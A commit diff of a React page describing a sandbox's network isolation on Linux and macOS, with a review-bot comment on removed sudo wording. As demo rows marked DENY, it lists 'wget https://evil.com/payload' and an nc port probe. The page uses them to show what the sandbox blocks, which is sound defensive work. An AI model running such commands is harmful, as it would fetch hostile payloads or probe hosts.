feat: small improvements

Nik L
2026-03-09 13:50:23 -04:00
parent 4a1d666ee2
commit 15368fc0bd
5 changed files with 95 additions and 92 deletions


@@ -91,66 +91,80 @@ export function Control() {
<h3 className="font-sans font-semibold text-sm">Network isolation</h3>
</div>
{platform === 'linux' ? (
<div className="space-y-3 text-sm font-serif">
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-red-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Full network namespace isolation</span> the
sandboxed process cannot see the host network at all.
</p>
<div className="space-y-4">
<div className="code-block p-4">
<div className="text-xs text-muted-foreground mb-2 font-sans uppercase tracking-wider">
Network namespace + TUN capture
</div>
<div className="font-mono text-xs space-y-1">
<div><span className="text-muted-foreground">bwrap</span> <span className="text-primary/80">--unshare-net</span> <span className="text-muted-foreground">\ </span></div>
<div className="ml-4"><span className="text-muted-foreground">tun2socks -device tun0 \</span></div>
<div className="ml-4"><span className="text-muted-foreground">-proxy</span> <span className="text-green-400/70">socks5://localhost:43052</span></div>
</div>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">TUN device captures every packet</span> at the
kernel even binaries that ignore proxy env vars.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-green-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Domain-level filtering</span> via GreyProxy.
Allow specific domains, block everything else adjustable live.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary/50 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">DNS bridging</span> transparent DNS relay
ensures name resolution works inside the sandbox.
</p>
<div className="space-y-2 font-mono text-xs">
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">curl https://api.anthropic.com</span>
<span className="text-green-400/70 text-[10px]">TUN &rarr; PROXY &rarr; ALLOW</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">npm install lodash</span>
<span className="text-green-400/70 text-[10px]">TUN &rarr; PROXY &rarr; ALLOW</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">wget https://evil.com/payload</span>
<span className="text-red-400/70 text-[10px]">TUN &rarr; PROXY &rarr; DENY</span>
</div>
<div className="flex items-center justify-between py-1.5">
<span className="text-greyhaven-offwhite">nc -z 10.0.0.1 22</span>
<span className="text-red-400/70 text-[10px]">TUN &rarr; PROXY &rarr; DENY</span>
</div>
</div>
<p className="text-xs text-muted-foreground font-serif leading-relaxed">
Full network namespace isolation the process can&apos;t see the host network.
Every packet hits the TUN device and routes through GreyProxy, including
binaries that ignore proxy env vars.
</p>
</div>
) : (
<div className="space-y-3 text-sm font-serif">
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-red-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Seatbelt network rules</span> block all outbound
connections except to the proxy address.
</p>
<div className="space-y-4">
<div className="code-block p-4">
<div className="text-xs text-muted-foreground mb-2 font-sans uppercase tracking-wider">
Generated Seatbelt policy
</div>
<div className="font-mono text-xs space-y-1">
<div className="text-red-400/70">(deny default)</div>
<div className="text-muted-foreground">(deny network-outbound)</div>
<div className="text-green-400/70">
(allow network-outbound
</div>
<div className="text-green-400/70 ml-4">
(remote tcp &quot;localhost:43051&quot;))
</div>
</div>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Proxy-based routing</span> via env vars. Traffic
from proxy-aware tools is filtered through GreyProxy.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-green-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Domain-level filtering</span> allow npm
registry and API hosts, block everything else.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary/50 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Localhost control</span> separate config for
port binding and local service access.
</p>
<div className="space-y-2 font-mono text-xs">
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">api.anthropic.com</span>
<span className="text-green-400/70 text-[10px]">VIA PROXY</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">registry.npmjs.org</span>
<span className="text-green-400/70 text-[10px]">VIA PROXY</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">evil.com (direct)</span>
<span className="text-red-400/70 text-[10px]">KERNEL DENY</span>
</div>
<div className="flex items-center justify-between py-1.5">
<span className="text-greyhaven-offwhite">analytics.vendor.io</span>
<span className="text-red-400/70 text-[10px]">PROXY DENY</span>
</div>
</div>
<p className="text-xs text-muted-foreground font-serif leading-relaxed">
All outbound traffic is blocked at the kernel. Only the proxy address is
reachable GreyProxy then applies domain-level allow/deny rules.
</p>
</div>
)}
</div>
@@ -203,7 +217,7 @@ export function Control() {
<div>
<span className="text-muted-foreground">$ </span>
<span className="text-greyhaven-offwhite">
{platform === 'linux' ? 'greywall --learning -- claude' : 'sudo greywall --learning -- claude'}
greywall --learning -- claude
</span>
</div>
<div className="text-muted-foreground mt-2">
@@ -227,7 +241,7 @@ export function Control() {
<p className="text-xs text-muted-foreground font-serif leading-relaxed">
{platform === 'linux'
? 'Uses strace to trace filesystem access. No special permissions needed. Auto-generates a template from observed paths.'
: 'Uses macOS Endpoint Security (eslogger) to trace access. Requires sudo for the trace, but the agent runs as your user. Generates a template automatically.'}
: 'Uses macOS Endpoint Security (eslogger) to trace access. Auto-generates a least-privilege template from observed paths.'}
</p>
</div>
</div>
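Review bot: The macOS learning-mode copy no longer tells the reader that tracing needs elevated privileges. As far as the rendered hunks show, the command is now `greywall --learning -- claude` on both platforms, and the eslogger description drops "Requires sudo for the trace, but the agent runs as your user." eslogger normally has to run as root, so unless greywall now elevates on its own (not visible in these hunks), macOS users will hit a permission failure or an unexplained password prompt, and the page loses its statement that the agent itself stays unprivileged. If elevation is still needed, keep that fact in the new string, e.g. `: 'Uses macOS Endpoint Security (eslogger) to trace access. The trace needs root, but the agent runs as your user. Auto-generates a least-privilege template from observed paths.'`. The enclosing `Control` component starts and ends outside the hunks.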